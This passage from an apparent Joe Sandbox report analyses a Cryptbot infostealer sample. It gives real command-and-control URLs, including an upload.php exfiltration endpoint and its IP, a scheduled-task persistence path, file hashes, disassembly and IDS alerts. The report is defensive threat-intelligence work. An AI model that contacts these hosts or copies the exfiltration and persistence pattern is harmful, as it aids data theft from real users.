http://sevtbb17sb.top/Q	file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpB	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/j	file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpH	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/z	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/q	file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.php$	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/	file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.php(	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phps	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.php	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpp	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpevN	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://keruzam.com/update.php?compName=	file.exe, file.exe, 00000000.00000003.2984794931.000000006A367000.00000002.00001000.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpv	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top//	file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/-	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/v1/upload.php6c	file.exe, 00000000.00000002.2987967621.000000000E076000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/v1/upload.phpP	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/9	file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/5	file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/3	file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/O	file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpd	file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/M	file.exe, 00000000.00000002.2987760536.00000000045C3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevtbb17sb.top/v1/upload.phpj	file.exe, 00000000.00000002.2986546316.000000000129A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2987384253.0000000004510000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.2303730585.0000000001BF9000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtbb17sb.top/A	file.exe, 00000000.00000002.2986546316.0000000001318000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.46.218.44	sevtbb17sb.top	Spain		203178	CUBENODEES	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1538262
Start date and time:	2024-10-20 22:46:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/2@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 6356 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:47:11	API Interceptor	54x Sleep call for process: file.exe modified
16:49:46	API Interceptor	2610393x Sleep call for process: service123.exe modified
21:49:15	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
193.46.218.44	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sevtbb17sb.top/v1/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sevtbb17sb.top	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	193.46.218.44

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CUBENODEES	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	193.46.218.44
	sh4.elf	Get hash	malicious	Mirai	Browse	213.220.16.0
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	213.220.10.117
	w4DO1Z18yg.wsf	Get hash	malicious	SmokeLoader	Browse	193.46.217.78
	UkHkCa3IYV.wsf	Get hash	malicious	SmokeLoader	Browse	193.46.217.78
	3312.PDF.wsf	Get hash	malicious	SmokeLoader	Browse	193.46.217.78
	RmbF3635xY.exe	Get hash	malicious	SmokeLoader	Browse	193.46.217.78
	https://public-usa.mkt.dynamics.com/api/orgs/656e8c66-5e77-ef11-ac1e-6045bd080c27/r/lmUG5F4EgUesqGwuJA5PigEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fcrm.interactivaclic.com%252Fn%252F%253Fc3Y9bzM2NV8xX29uZSZyYW5kPVNUVjBVakk9JnVpZD1VU0VSMjMwOTIwMjRVMjYwOTIzMjE%253DN0123N%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=HTFuI1dWNsWznL3K1x2s1mvQbKix%2BdykwHJYfkmm7o4%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15ee	Get hash	malicious	Unknown	Browse	89.44.32.18
	cFvDKWB1V8.ps1	Get hash	malicious	XWorm	Browse	83.147.55.182
	New_Document-660111409161.wsf	Get hash	malicious	XWorm	Browse	83.147.55.182

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405570998787954
Encrypted:	false
SSDEEP:	768:RWE9OaBxc0AJF8JAfPrYU3HcW534/lVBilW7xbAOxuz/kQ:TxBxcEJAfPrYSHcW6/CGBuz7
MD5:	65DFC01E9903D5B061EA2A791EC0F5AD
SHA1:	DA7C9612AECB3B9C8DD1F60DCEC1F515DC84A8DE
SHA-256:	870C54BDB3F907CCD7E04F6F1827AA2F3D9E008624ABCFA848EF4777DC608BAD
SHA-512:	FA075B9BF0E45BB25F750C9493DCD7B7E6CC6FAA9B0156166FB1F27A6509B2F6C64A772D1BC7D6D9EA67C2C5319295B74C1949DD12E64653893F77D6689DB3FD
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.g...............(.v........................@.......................... .......X....@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\uAGceqKEYCLcAMToKQDI.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.0543569309390642
Encrypted:	false
SSDEEP:
MD5:	96D915BBE53CB9AC3F7E0EAA9602A116
SHA1:	CF7E36431721AC403A7E400CF1198DCF4A2F115F
SHA-256:	692DB3989B7B8E474F73FEC9F34C9C34C57EEFBC700ED221A696E2341E9BD881
SHA-512:	B8DDCC385F5F1A8522087D717CF60C0DCE26AF404273FE2BF4275CB873DEC67CBC62A9160F4A79A3F4092EB3A2F710E1BF2F4E53208EA2EFFA76C8610A8AA4CF
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.g...........#...(...........................i.........................@............@... .........................`.......................................@z...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..@z.......\|...J..............@..B................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.251105473144456
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	7'257'088 bytes
MD5:	0ddaf55ff5b6daf269845dee74b4f24b
SHA1:	9b9363db8deadeee5803ce1751230fb56d776501
SHA256:	6798b30915ded323d8ca7f310a7d518cfa5de39bcc20ae984c9a3b65ccbeb941
SHA512:	262dab88704c4aff25f7b802759699ad1c712c227ec8afad5354ed2f37ef8a5510edaf692eb39e95f9dac695990176ad78e1720044343a855069b042dd09d763
SSDEEP:	49152:n79YagFmdXM5AMGGLNFAm8jUXIlKcupRGCDZXRoYQBRy+ueXH3HmZpBm2nfP/8sP:npBxMZLNCm8jHlK5DZX
TLSH:	8A7650B9DE9B03FAC5C349B68055B27F7D34AB009C39D6F9EE81DB90D361A23D698404
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2.g...............(.0L...n..............@L...@.......................... o.......n...@... ............................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x671532D9 [Sun Oct 20 16:42:01 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	41db2083dac89343aef584a51a80b293

Entrypoint Preview

Instruction
mov dword ptr [00A83070h], 00000001h
jmp 00007F6AFCBD8146h
nop
mov dword ptr [00A83070h], 00000000h
jmp 00007F6AFCBD8136h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F6AFCBE67EEh
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00A70000h
call dword ptr [00A8423Ch]
sub esp, 04h
test eax, eax
je 00007F6AFCBD8505h
mov ebx, eax
mov dword ptr [esp], 00A70000h
call dword ptr [00A84270h]
mov edi, dword ptr [00A84248h]
sub esp, 04h
mov dword ptr [00A83028h], eax
mov dword ptr [esp+04h], 00A70013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00A70029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008C4004h], eax
test esi, esi
je 00007F6AFCBD84A3h
mov dword ptr [esp+04h], 00A8302Ch
mov dword ptr [esp], 00A80104h
call esi
mov dword ptr [esp], 00401580h
call 00007F6AFCBD83F3h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x684000	0xb78	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x687000	0x6aec0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x67e204	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x68421c	0x1cc	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4c2f48	0x4c3000	60773c95d810d49602a67b600b2da35a	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4c4000	0x1ab160	0x1ab200	a11b5698676f557237528282fdfca0fe	False	0.030812161618378693	dBase III DBT, version number 0, next free block index 10, 1st item "\372"F"	0.46265326785415484	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x670000	0xf2e4	0xf400	264b0367d8ebc8daf45d1b0cc94bd30e	False	0.25406634221311475	data	5.911368544963618	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x680000	0x210c	0x2200	10ca2377bf1e0cd6be11e9934b627910	False	0.31973805147058826	data	4.785313419083708	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x683000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x684000	0xb78	0xc00	9829978b565b1e3662ffb326b14eebc9	False	0.4046223958333333	data	5.052778471717284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x685000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x686000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x687000	0x6aec0	0x6b000	abb48ddc13b7510d0c63f66c7b12819e	False	0.1521383980724299	data	6.7958107140272705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetNativeSystemInfo, GetProcAddress, GetProcessHeap, GetStartupInfoA, GetThreadLocale, HeapAlloc, HeapFree, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, _wcsnicmp, abort, atoi, bsearch, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, mbstowcs, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, qsort, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-20T22:47:14.177580+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49730	193.46.218.44	80	TCP
2024-10-20T22:47:15.460620+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49731	193.46.218.44	80	TCP
2024-10-20T22:47:16.939730+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49732	193.46.218.44	80	TCP
2024-10-20T22:47:18.231591+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49733	193.46.218.44	80	TCP
2024-10-20T22:47:19.483270+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49734	193.46.218.44	80	TCP
2024-10-20T22:47:20.739676+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49735	193.46.218.44	80	TCP
2024-10-20T22:47:21.988846+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49737	193.46.218.44	80	TCP
2024-10-20T22:47:23.306546+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49739	193.46.218.44	80	TCP
2024-10-20T22:47:24.550897+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49742	193.46.218.44	80	TCP
2024-10-20T22:47:25.813529+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49744	193.46.218.44	80	TCP
2024-10-20T22:47:27.056074+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49747	193.46.218.44	80	TCP
2024-10-20T22:47:28.332785+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49749	193.46.218.44	80	TCP
2024-10-20T22:47:29.573331+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49751	193.46.218.44	80	TCP
2024-10-20T22:47:30.899693+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49753	193.46.218.44	80	TCP
2024-10-20T22:47:32.187509+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49755	193.46.218.44	80	TCP
2024-10-20T22:47:33.815859+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49757	193.46.218.44	80	TCP
2024-10-20T22:47:35.074961+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49758	193.46.218.44	80	TCP
2024-10-20T22:47:36.423971+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49759	193.46.218.44	80	TCP
2024-10-20T22:47:37.678281+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49760	193.46.218.44	80	TCP
2024-10-20T22:47:39.227376+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49761	193.46.218.44	80	TCP
2024-10-20T22:47:40.623127+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49762	193.46.218.44	80	TCP
2024-10-20T22:47:41.941495+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49763	193.46.218.44	80	TCP
2024-10-20T22:47:43.270187+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49764	193.46.218.44	80	TCP
2024-10-20T22:47:45.480586+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49765	193.46.218.44	80	TCP
2024-10-20T22:47:46.820515+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49766	193.46.218.44	80	TCP
2024-10-20T22:47:48.185050+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49767	193.46.218.44	80	TCP
2024-10-20T22:47:49.781020+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49768	193.46.218.44	80	TCP
2024-10-20T22:47:51.405117+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49769	193.46.218.44	80	TCP
2024-10-20T22:47:53.033182+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49770	193.46.218.44	80	TCP
2024-10-20T22:47:54.685049+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49771	193.46.218.44	80	TCP
2024-10-20T22:47:56.285079+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49772	193.46.218.44	80	TCP
2024-10-20T22:47:57.985042+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49773	193.46.218.44	80	TCP
2024-10-20T22:47:59.629008+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49774	193.46.218.44	80	TCP
2024-10-20T22:48:01.233075+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49776	193.46.218.44	80	TCP
2024-10-20T22:48:03.841471+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49787	193.46.218.44	80	TCP
2024-10-20T22:48:07.858828+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49798	193.46.218.44	80	TCP
2024-10-20T22:48:09.313856+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49808	193.46.218.44	80	TCP
2024-10-20T22:48:10.727401+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49815	193.46.218.44	80	TCP
2024-10-20T22:48:12.284875+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49822	193.46.218.44	80	TCP
2024-10-20T22:48:13.801473+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49833	193.46.218.44	80	TCP
2024-10-20T22:48:15.228986+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49840	193.46.218.44	80	TCP
2024-10-20T22:48:16.674355+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49847	193.46.218.44	80	TCP
2024-10-20T22:48:18.128906+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49854	193.46.218.44	80	TCP
2024-10-20T22:48:19.686961+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49866	193.46.218.44	80	TCP
2024-10-20T22:48:21.131853+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49873	193.46.218.44	80	TCP
2024-10-20T22:48:22.556092+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49880	193.46.218.44	80	TCP
2024-10-20T22:48:23.960187+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49890	193.46.218.44	80	TCP
2024-10-20T22:48:25.394793+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49896	193.46.218.44	80	TCP
2024-10-20T22:48:26.934373+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49902	193.46.218.44	80	TCP
2024-10-20T22:48:28.537204+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49913	193.46.218.44	80	TCP
2024-10-20T22:48:29.961950+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49919	193.46.218.44	80	TCP
2024-10-20T22:48:31.744837+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49924	193.46.218.44	80	TCP
2024-10-20T22:48:33.289901+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49934	193.46.218.44	80	TCP
2024-10-20T22:48:34.968084+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.4	49941	193.46.218.44	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 20, 2024 22:47:13.003176928 CEST	49730	80	192.168.2.4	193.46.218.44
Oct 20, 2024 22:47:13.009001017 CEST	80	49730	193.46.218.44	192.168.2.4
Oct 20, 2024 22:47:13.009109974 CEST	49730	80	192.168.2.4	193.46.218.44
